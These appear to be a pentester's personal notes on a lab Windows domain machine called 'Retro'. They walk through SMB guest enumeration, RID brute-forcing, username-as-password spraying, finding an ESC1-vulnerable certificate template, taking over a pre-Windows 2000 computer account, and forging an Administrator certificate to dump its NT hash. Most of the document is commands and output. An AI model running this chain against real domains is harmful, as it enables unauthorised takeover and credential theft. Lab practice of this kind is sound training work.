Retro

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Windows

Chain: False (standalone compromise)

Credentials

Username

Password

Method

Scope

trainee

Username as Password (Bruteforce userlist)

Domain User

✅ Valid Usernames

jburley
trainee
tblack
HelpDesk

🔑 Passwords list

trainee

Information Gathering

# Nmap 7.94SVN scan initiated Tue Apr  1 12:18:06 2025 as: nmap -p- -A --open -T5 -Pn -n -oN ext_retro_tcp_allports -vvv --min-rate 3000 10.10.105.102
53/tcp    open  tcpwrapped syn-ack
88/tcp    open  tcpwrapped syn-ack
135/tcp   open  tcpwrapped syn-ack
139/tcp   open  tcpwrapped syn-ack
445/tcp   open  tcpwrapped syn-ack
3268/tcp  open  tcpwrapped syn-ack
3389/tcp  open  tcpwrapped syn-ack
49664/tcp open  tcpwrapped syn-ack
49669/tcp open  tcpwrapped syn-ack
49679/tcp open  tcpwrapped syn-ack
49711/tcp open  tcpwrapped syn-ack

Service Enumeration

DNS

Not vulnerable to AXFR

SMB (enum4linux-ng)

Server allows null session
Server allows guest user
Not Group.xml (gpp file).

SMB Shares enumeration

nxc smb 10.10.105.102 -u 'Intrusionz3r0' -p '' --share Trainees -M spider_plus
nxc smb 10.10.105.102 -u 'Intrusionz3r0' -p '' --share Trainees -M spider_plus -o DOWNLOAD_FLAG=True

File: Important.txt
--------------------------------------------------------------------------------------------
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

Enumerating domains users via rid-bruteforce

nxc smb 10.10.105.102 -u 'dfdfsd' -p '' --rid-brute
SMB         10.10.105.102   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.105.102   445    DC               [+] retro.vl\dfdfsd: (Guest)
SMB         10.10.105.102   445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.105.102   445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         10.10.105.102   445    DC               501: RETRO\Guest (SidTypeUser)
SMB         10.10.105.102   445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         10.10.105.102   445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         10.10.105.102   445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         10.10.105.102   445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         10.10.105.102   445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         10.10.105.102   445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         10.10.105.102   445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         10.10.105.102   445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         10.10.105.102   445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         10.10.105.102   445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.105.102   445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.105.102   445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.105.102   445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         10.10.105.102   445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         10.10.105.102   445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.105.102   445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.105.102   445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.105.102   445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.105.102   445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         10.10.105.102   445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         10.10.105.102   445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.105.102   445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         10.10.105.102   445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         10.10.105.102   445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         10.10.105.102   445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         10.10.105.102   445    DC               1109: RETRO\tblack (SidTypeUser)

Username as password brute-forcing

nxc smb 10.10.105.102 -u users.txt  -p users.txt --no-bruteforce
SMB         10.10.105.102   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
<SNIF>
SMB         10.10.105.102   445    DC               [+] retro.vl\trainee:trainee

Enumerating the SMB shares with valid credentials

nxc smb 10.10.105.102 -u trainee  -p trainee --share notes -M spider_plus -o DOWNLOAD_FLAG=True

File: ToDo.txt
-----------------------------------------------------------------------------------------
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

Discovering a vulnerable template to ESC1

certipy-ad find -u trainee  -p trainee -vulnerable -stdout -dc-ip 10.10.105.102
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIF>
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

Discovering a pre-Windows 2000 computer account

In Active Directory, when administrators create computer accounts with the "Assign this computer account as a pre-Windows 2000 computer" option enabled, the system sets the account's password to the computer's name in lowercase. For example, a computer account named "Workstation1$" would have a default password of "workstation1"

nxc ldap 10.10.105.102 -u trainee  -p trainee --bloodhound -c all --dns-server 10.10.105.102
SMB         10.10.105.102   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP        10.10.105.102   389    DC               [+] retro.vl\trainee:trainee 
LDAP        10.10.105.102   389    DC               Resolved collection methods: acl, group, localadmin, container, psremote, trusts, rdp, objectprops, dcom, session
LDAP        10.10.105.102   389    DC               Done in 00M 29S
LDAP        10.10.105.102   389    DC               Compressing output into /home/Intrusionz3r0/.nxc/logs/DC_10.10.105.102_2025-04-01_131248_bloodhound.zip

❯ nxc smb 10.10.105.102 -u BANKING$  -p banking
SMB         10.10.105.102   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.105.102   445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

Compromise Domain Controller

❯ impacket-changepasswd retro.vl/'BANKING$':'banking'@10.10.105.102 -p rpc-samr
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

New password: 
Retype new password: 
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

certipy-ad req -u BANKING$  -p password123! -dc-ip 10.10.105.102 -ca retro-DC-CA -template RetroClients -upn Administrator -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

certipy-ad auth -dc-ip 10.10.105.102 -username Administrator -pfx administrator.pfx -domain retro.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389

Last updated 6 months ago

hashtagMachine information

hashtagCredentials

hashtagInformation Gathering

hashtagService Enumeration

hashtagDNS

hashtagSMB (enum4linux-ng)

hashtagSMB Shares enumeration

hashtagEnumerating domains users via rid-bruteforce

hashtagUsername as password brute-forcing

hashtagEnumerating the SMB shares with valid credentials

hashtagDiscovering a vulnerable template to ESC1

hashtagDiscovering a pre-Windows 2000 computer account

hashtagCompromise Domain Controller